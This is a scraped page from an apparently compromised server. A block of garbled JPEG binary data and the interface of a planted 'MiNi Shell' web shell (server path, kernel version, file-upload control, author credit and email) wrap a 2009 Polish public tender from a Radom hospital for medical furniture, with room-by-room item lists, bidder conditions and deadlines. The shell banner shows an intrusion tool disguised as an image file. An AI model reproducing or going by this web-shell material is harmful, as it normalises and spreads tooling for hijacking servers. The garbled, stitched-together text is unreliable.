JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090723/251692-N-2009.html

<p class="kh_header"><b>Radom: zakup i dostawę mebli medycznych zaprojektowanie wyposażenia w meble na podstawie dokumentacji technicznej, wykonanie dostawy i montażu dla potrzeb Zakładu Opieki Długoterminowej z Zakładem Pielęgnacyjno Opiekuńczym, 
Zakładem Opiekuńczo-Leczniczym Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 251692 - 2009; data zamieszczenia: 23.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup i dostawę mebli medycznych zaprojektowanie wyposażenia w meble na podstawie dokumentacji technicznej, wykonanie dostawy i montażu dla potrzeb Zakładu Opieki Długoterminowej z Zakładem Pielęgnacyjno Opiekuńczym, 
Zakładem Opiekuńczo-Leczniczym Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zakup i dostawę n-w mebli medycznych -zaprojektowanie wyposażenia w meble na podstawie dokumentacji technicznej, wykonanie dostawy i montażu- dla potrzeb Zakładu Opieki Długoterminowej z Zakładem Pielęgnacyjno Opiekuńczym, Zakładem Opiekuńczo-Leczniczym Radomskiego Szpitala Specjalistycznego. 

MEBLE MEDYCZNE:

I PIĘTRO 
101 Kuchenka oddziałowa 
1. Stół kuchenny do pracy z półką dolną, wymiary 800 x 600 x 850, metalowy, stal nierdzewna,  odporny na środki dezynfekcyjne - 1 szt.
3. Stół do pracy z szafkami, wymiary 800 x 600 x 850, blat metalowy, stal nierdzewna, odporny na środki dezynfekcyjne - 1 szt.
4. Umywalka jednokomorowa  ze stali nierdzewnej, odporny na środki dezynfekcyjne, wymiary 400 x 400 x 350 - 1 szt. 
5. Basen do mycia naczyń kuchennych ze stali nierdzewnej, odporny na środki dezynfekcyjne, wymiary  700 x 600 x 850 - 1 szt. 
6.  Regał ociekowy ze stali nierdzewnej, odporny na środki dezynfekcyjne, wymiary    400 x 400 x 1800 - 1 szt.
102. Zmywalnia naczyń stołowych 
7. Wózek na posiłki (żywnościowy) z półką, metalowy, stal nierdzewna, odporny na środki dezynfekcyjne 
8. Blat do pracy z dolną półką, obejmujący zlew i zmywarkę podblatową, wymiary  1200 x 600 x 850 - 1 szt. , metalowy, stal nierdzewna, odporny na środki dezynfekcyjne 
9. Zlew  jednokomorowy ze stali nierdzewnej  
11. Szafa przelotowa na naczynia, odporna na wilgoć i ścieranie z drzwiczkami, typu MDF
103. Gabinet zabiegowy 
12. Blat roboczy na szafkach z szufladami,  ze zmywakiem 2-komorowym i umywalką,  wykonany z blach kwasoodpornej, nierdzewnej  
13. Szafki wiszące nad blatem, wykonane z materiału odpornego na środki dezynfekcyjne,   typu MDF 
14. Fotel do biurka - 1 szt., na kółkach, zmywalny   
15. Biurko lekarskie, wymiary  1105 x 600 x 780 - 1 szt. 
17. Szafa lekarska 2-drzwiowa, wymiary  1000 x 435 x 1800 - 1 szt., wykonana z blachy malowanej  proszkowo, odpornej na środki dezynfekcyjne, w 1-3 wysokości szafy szuflady, 2-3  oszklone z półkami, na nóżkach   
18. Szafa na sprzęt medyczny jednodrzwiowa, przeszklona ,na nóżkach, wykonana z blachy  malowanej proszkowo, odpornej na środki dezynfekcyjne, w 1-3 wysokości szafy, szuflady, 2-3 oszklone z półkami
104. Pomieszczenie porządkowe 
19. Szafa na sprzęt porządkowy,  wymiary  800 x 500 x 800 - 1 szt., metalowa, z półkami, zamykana na   klucz, na nóżkach, odporna na środki dezynfekcyjne
20. Blat do pracy z szafką dolną, zamykana na klucz, blat metalowy, wymiary  850 x 600 x 850 - 1 szt., 
21. Regał, wymiary  900 x 400 x 1800 - 1 szt., otwarty, typu MDF, odporny na ścieranie i wilgoć
22. Regał z uchwytami na sprzęt porządkowy,  wymiary  800x400x1800, typu MDF, odporny na   ścieranie i wilgoć
23. Basen do mycia sprzętu porządkowego, stal nierdzewna
105. Brudownik 
22. Płuczko - dezynfektor, wymiary  4500 x 500 x 1300 odpływ ścienny - 1 szt. 
23. Szafa z uchwytami do basenów i kaczek, odporna na ścieranie, wilgoć i środki dezynfekcyjne 
24. Regał, wymiary  400 x 600 x 1800 - 1 szt. typu MDF, odporny na ścieranie i wilgoć 
25. Wózek/statyw na odpady komunalne z pokrywą, pojemność min. 120 l., metalowa konstrukcja, stal nierdzewna
26. Wózek/statyw na odpady medyczne z pokrywą, pojemność min. 120 l., metalowa konstrukcja, stal nierdzewna
106. Pokój socjalny 
25. Blat roboczy na szafkach z szufladami, z umywalką i zmywakiem 2-komorowym oraz miejscem na mikrofalówkę - 1 kpl. typu MDF, wodoodporny, odporny na ścieranie
26. Szafki wiszące nad blatem
29. Krzesło zwykłe - 5 szt. 
30. Sofa z materiału zmywalnego 
107. Dyżurka pielęgniarek 
30. Szafa biurowa, wymiary   1000 x 435 x 1800 - 1 szt. w ? górnej wysokości półki z przegródkami,   otwarta, w ?  dolnej części półki zamykane na klucz  
32. Biurko lekarskie, wymiary  1105 x 600 x 780 - 1 szt. 
33. Fotel biurowy. 
34. Blat roboczy z umywalką na szafkach z szufladami - 1 szt. typu MDF, wodoodporny, odporny na  środki dezynfekcyjne 
35. Szafki wiszące - 1 kpl. 
36. Krzesło zwykłe- 2 szt.
31. Blat typu MDF
a)	część dolna szafka z szufladami na klucz, część górna witryna stojąca  na szafce zamykanej na klucz
b)	część dolna pusta, (miejsce na wózek z lekami)
37. Szafka na klucze około 24 haczyki 
107 A. Dyżurka pielęgniarek- lada biurowa
28. Blat /lada 1600x60 x780, szafki na kółkach z szufladami - 2 szt.
29. Fotele biurowe -2 szt.
30. Regał z przegrodami -380x1600
110. Pokój kierownika 
36. Biurko 1600 x 650 x 780 - 1 szt.
37. Przystawka do biurka ,półokrągła- 1 szt. 
38. Fotel do biurka, wyprofilowane siedzisko i oparcie, regulowane- 1 szt. 
39. Segment biurowy z szafą ubraniową - 1 szt. typu MDF
40. Stolik niski 800 x 600 - 1 szt. 
41.Fotele, zmywalne - 2 szt.
42. Wieszak ścienny - 1 szt. 
43. Krzesła zwykłe - 2 szt. 
44.  Kanapa zmywalna
45.  kontener na kółkach z 4 szufladami- 2 sztuki 
113. Pro-Morte
45. Stolik 600x600x 720
46. Krzesło plastikowe na metalowych nogach
114. Pokój lekarski 
44. Biurko lekarskie 1105 x 600 x 780 - 1 szt. 
45. Fotel do biurka - 1 szt. 
46. Krzesło zwykłe - 1 szt. 
47. Szafka stojąca z szufladami, zamykana na klucz, typu MDF- 1 szt.
48. Kozetka lekarska 1900 x 610 x 595 - 1 szt. 
49. Szafa ubraniowa
116. Izolatka 
52. Stolik 600 x 600 x 720 - 1 szt. 
53. Krzesło z plastiku, nogi chromowane-metalowe - 1 szt.
54. Taboret przyłóżkowy na metalowych nogach, siedzisko plastikowe 1 szt.
55. Szafa ubraniowa
117. Łazienka 
54. Płuczko - dezynfektor 450 x 500 x 1300 - 1 szt. 
118. Pokój chorych 1-łóżkowy 
58. Stolik 600 x 600 x 720 - 1 szt., typu MDF
59. Krzesło z plastiku, nogi chromowane- metalowe-z blachy stalowej -1szt. 
60. Taboret przyłóżkowy na metalowych nogach, siedzisko plastikowe-1 szt.
119 Sekretariat 
60. Biurko 1600 x 650 x 780 - 1 szt., z półokrągłym blatem, miejsce na komputer i klawiaturę, z szufladami, z szafką zamykaną  na kluczyk, nadstawka z półkami
61. Fotel do biurka, wyprofilowane siedzisko i oparcie, regulowane- 1 szt. 
62. Stolik 600 x 600 x 600 - 1 szt. 
63. Segment biurowy z szafą ubraniową - 1 kpl.
64. Krzesło zwykłe - 2 szt. 
120. Pokój biurowy 
65a.Stolik/ przystawka na komputer 1 szt. min.800 x 800
66. Fotel do biurka -, wyprofilowane siedzisko i oparcie, regulowane- 1 szt. 
67. Segment biurowy z szafą ubraniową - 1 szt.- istnieje 
68. Stolik 600 x 600 x 600 - 1 szt. 
69. Krzesło zwykłe - 2 szt. 
70. Szafka na klucze, zamykana ,min.60  haczyków, wisząca
124,126-130 Pokoje chorych 
74. Stolik 600 x 600 x 780 - 6 szt. , typu MDF
75. Krzesło z plastiku, nogi chromowane-metalowe-z blachy stalowej - 13 szt.
76.Taboret przyłóżkowy na metalowych nogach, siedzisko plastikowe- 13 szt.
33. Jadalnia 
78. Krzesło z plastiku, nogi chromowane-metalowe-z blachy stalowej-13 szt. 
79. Komoda z szufladami 800x400x850 - 2 szt., typu MDF
134. Magazyn materiałów czystych 
79. Regał magazynowy 900 x 400 x 1800 - 5 szt. 
80. Szafa magazynowa zamykana  1100 x 400 x 1800 - 3 szt. 
II. PIĘTRO 
201. Kuchenka oddziałowa 
1.Stół do pracy z dolną półką 800 x 600 x 850 - 1 szt. metalowy, stal nierdzewna, odporny na środki dezynfekcyjne
3. Stół do pracy z szafkami , blat metalowy 800 x 600 x 850 - 1 szt. 
4. Regał ociekowy ze stali nierdzewnej  400 x 400 x 1800 - 1 szt. 
5. Basen do mycia naczyń ze stali nierdzewnej 700 x 600 x 850 - 1 szt. 
6. Umywalka jednokomorowa ze stali nierdzewnej 400 x 400 x 350 - 1 szt. 
7. Szafa na naczynia stołowe typu MDF,  400 x 600 x 1800 - 1 szt. 
202. Zmywalnia naczyń stołowych 
9,10. Blat do pracy ze zlewem jednokomorowym i miejscem na zmywarkę - 1 szt., stal nierdzewna, odporna na środki dezynfekcyjne 
8. Wózek na posiłki -żywnościowy- z półką, metalowy, stal nierdzewna, odporny na środki dezynfekcyjne 
203. Pokój lekarski 
12. Biurko lekarskie 1105 x 600 x 780 - 1 szt. 
13. Fotel do biurka - 1 szt. 
14. Krzesło zwykłe - 1 szt. 
15. Szafka stojąca z szufladami 745 x 450 x 800 - 1 szt.
16. Kozetka lekarska 1900 x 610 x 595 - 1 szt. 
17. Szafa  ubraniowa 1-drzwiowa - 1 szt. 
206. Dyżurka pielęgniarek 
17. Szafa biurowa 1000 x 435 x 1800 - 1 szt. w ? górnej wysokości półki z przegródkami,   otwarta, w ?  dolnej części półki zamykane na klucz  
18. Blat z dwoma miejscami do pracy, typu MDF, część dolna szafka z szufladami na klucz, część górna witryna stojąca  na szafce zamykanej na klucz
20. Blat roboczy na szafkach z umywalką - 1 kpl. 
21. Szafki wiszące nad blatem - 1 kpl. 
22. Fotele biurowe- 2 szt.
23. Szafka na klucze, wisząca, zamykana, min.24 haczyki
208. Gabinet zabiegowy 
24. Biurko lekarskie 1105 x 600 x 780 - 1 szt. 
25. Fotel do biurka - 1 szt. 
27. Szafa lekarska 2-drzwiowa, wykonana z blachy malowanej  proszkowo, odpornej na środki dezynfekcyjne, w 1/3 wysokości szafy szuflady, 2/3 oszklone z półkami, na nóżkach 1000 x 435 x 1800 - 1 szt. 
28. Blat roboczy na szafkach z umywalką i zmywakiem 2-komorowym, typu MDF, odporny na ścieranie, środki dezynfekcyjne, zaokrąglony - 1 kpl. 
29. Szafki wiszące - 1 kpl. 
209. Brudownik 
31. Regał 600 x 400 x 1800 - 1 szt. 
32. Szafa z uchwytami na kaczki i baseny - 1 szt.  
33.Wózek/statyw na odpady komunalne z pokrywą, pojemność min.120 l., metalowa konstrukcja, 
34.Wózek/statyw na odpady medyczne z pokrywą ,pojemność min.120 l., metalowa konstrukcja, 
210. Pomieszczenie porządkowe 
33. Blat do pracy z szafką dolną, zamykana na klucz, blat metalowy 850 x 600 x 850 - 1 szt., 
34. Szafa na sprzęt porządkowy 800 x 500 x 800 - 1 szt., metalowa ,z półkami, zamykana na   klucz, na nóżkach, odporna na środki dezynfekcyjne
35. Regał z uchwytami na sprzęt porządkowy 800x400x1800, typu MDF, odporny na   ścieranie i wilgoć
36. Regał 900 x 400 x 1800 - 1 szt., otwarty, typu MDF, odporny na ścieranie i wilgoć
37. Basen do mycia sprzętu porządkowego, stal nierdzewna
215. Pokój socjalny 
36. Krzesło zwykłe - 5 szt. 
37. Blat roboczy na szafkach z umywalką i zmywakiem 1 - komorowym - 1 kpl. 
38. Szafki wiszące - 1 kpl. 
39. Sofa z materiału zmywalnego, nierozkładana
216 -218-221 Pokoje chorych 
42. Stolik 600 x 600 x 780 - 5 szt. 
43. Krzesło z plastiku, nogi chromowane-metalowe-z blachy stalowej  - 8 szt. 
45.  Taborety- 12szt.
223. Fizykoterapia 
47. Stolik 600 x 600 x 780 - 1 szt. 
48. Krzesło zwykłe - 2 szt. 
50. Wieszak ubraniowy ścienny - 1 szt.
49. Taboret - 3 szt.
224. Kinezyterapia 
53. Szafa na sprzęt rehabilitacyjny - 1 szt. 
55. Lustro medyczne, rehabilitacyjne do korekcji postawy, przestawne
225, 226. Pokoje chorych
58. Stolik 600 x 600 x 780 - 2 szt.
59. Krzesło z plastiku, nogi chromowane-metalowe-z blachy stalowej - 4 szt.
60. Taboret - 4 szt.
229. Jadalnia 
63.Komoda typu MDF - szer. 800  z szufladami 
62.Krzesła z plastiku nogi chromowane - 14 szt.
230. Magazyn materiałów czystych 
63. Regał magazynowy 1800 x 400 x 1800 - 2 szt. 
64. Szafa magazynowa 1500 x 400 x 1800 - 1 szt. 
231. Pokój terapeutyczny 
65. Regał meblowy z szafą - 1 kpl. , typu MDF
67. Krzesło z plastiku, nogi chromowane/metalowe/z blachy stalowej - 3 szt. 
232. Zaplecze pokoju 
70. Szafa ubraniowa  600 x 400 x 1800 - 1 szt. 
002, 003 Szatnia personelu - znajdująca się w piwnicy
13. Szafka  dwukomorowa- dwuosobowa, metalowa, malowana proszkowo  - 20 szt.
14. Wieszak stojący, ubraniowy, do przenoszenia - 4 szt. 

Zamawiający załącza pomocnicze rysunki zagospodarowania pomieszczeń I i II piętra wraz z rozmieszczeniem mebli medycznych w tych pomieszczeniach
Rysunki te są dla Wykonawcy pomocniczą wersją, na podstawie której zaprojektuje wyposażenie medyczne, następnie dokona dostawy i montażu tego wyposażenia.
Wykonawca przed złożeniem oferty powinien dokonać wizji lokalnej (wykonanie własnych obmiarów) i na tej podstawie zaprojektować wyposażenie w meble.
Kolorystyka poszczególnego wyposażenia medycznego musi być  uzgodniona przed podpisaniem umowy z osobą uprawnioną ze strony Zamawiającego.
Legenda odnoście w/w nr wyposażenia - umieszczona także na rysunkach (jak w załącznikach)
Załącznik do opisu przedmiotu zamówienia:
1. Rysunku zagospodarowania pomieszczeń I i II piętra wraz z piwnicą).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 12.1.	Zamawiający określa wadium w wysokości: 4 000,00 zł ( slownie : cztery tysiące)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki ogólne: Wykonawca nie może podlegać wykluczeniu z postępowania o udzieleniu zamówienia na podstawie art. 24, ust. 1 i ust. 2 ustawy Prawo zamówień publicznych.
2.	Warunki szczegółowe:
1)	Potencjał kadrowy: Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę.
2)	Doświadczenie: Wykonawca posiada niezbędną wiedzę i doświadczenie do wykonania przedmiotu zamówienia - a szczególności:
- Wykonawca musi wykazać, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywał, min. 2 dostawy w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem dostawom stanowiącym przedmiot zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę.
3)	Potencjał techniczny: Wykonawca dysponuje potencjałem technicznym niezbędnym do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę
4)	Potencjał finansowo-ekonomiczny: Wykonawca dysponuje własnymi środkami finansowymi zapewniającymi wykonanie zamówienia. Powyższy warunek powinien być spełniony łącznie przez podmioty składające wspólną ofertę
3.	Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie załączonych dokumentów i oświadczeń wg. formuły spełnia- nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24, ust. 1 i ust. 2 ustawy Pzp 
2.	Oświadczenie Wykonawcy  o spełnianiu warunków  określonych w art. 22 ust 1, pkt. 1-3 ustawy Pzp. 
3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, albo w przypadku Wykonawcy, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej - składa on dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji, ani nie ogłoszono jego upadłości. Jeżeli w kraju pochodzenia osoby, lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa  powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiedniego kraju pochodzenia osoby, lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4.	Informacja o doświadczeniu zawodowym Wykonawcy (Doświadczenie zawodowe). Informacja musi potwierdzać spełnienie warunku o którym mowa w pkt 9.2. ppkt 2):
-Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, min. 2 dostawy w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy zostały wykonane należycie.
5.	Zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczony przedmiot zamówienia odpowiada określonym normom lub specyfikacjom technicznym, tj.
a)	deklaracja zgodności CE wystawiona przez producenta lub
b)	certyfikat jednostki notyfikowanej uczestniczącej w procesie notyfikacji zgodnie z ustawą z 20 kwietnia 2004 r. o wyrobach medycznych (tekst jedn. Dz. U. z 2004 r. Nr 93 poz. 896) lub
c)	zaświadczenie o wpisie do Rejestru Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych oferowanego towaru.
6.	Projekt wyposażenia w meble wraz z opisem, rysunkami, katalogami itp.  oferowanego przedmiotu zamówienia.
7.	Parafowany Wzór Umowy.
8.	 Wypełniony formularz oferty.
9.	Dokument potwierdzający wniesienie wadium.
10.	Pełnomocnictwo do reprezentowania, o ile ofertę składa pełnomocnik..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych i Zaopatrzenia
III piuętro pok.309A; 26-610 Radom; ul. Lekarska 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2009 godzina 12:00, miejsce: Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych i Zaopatrzenia
III piuętro pok.309A; 26-610 Radom; ul. Lekarska 4.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com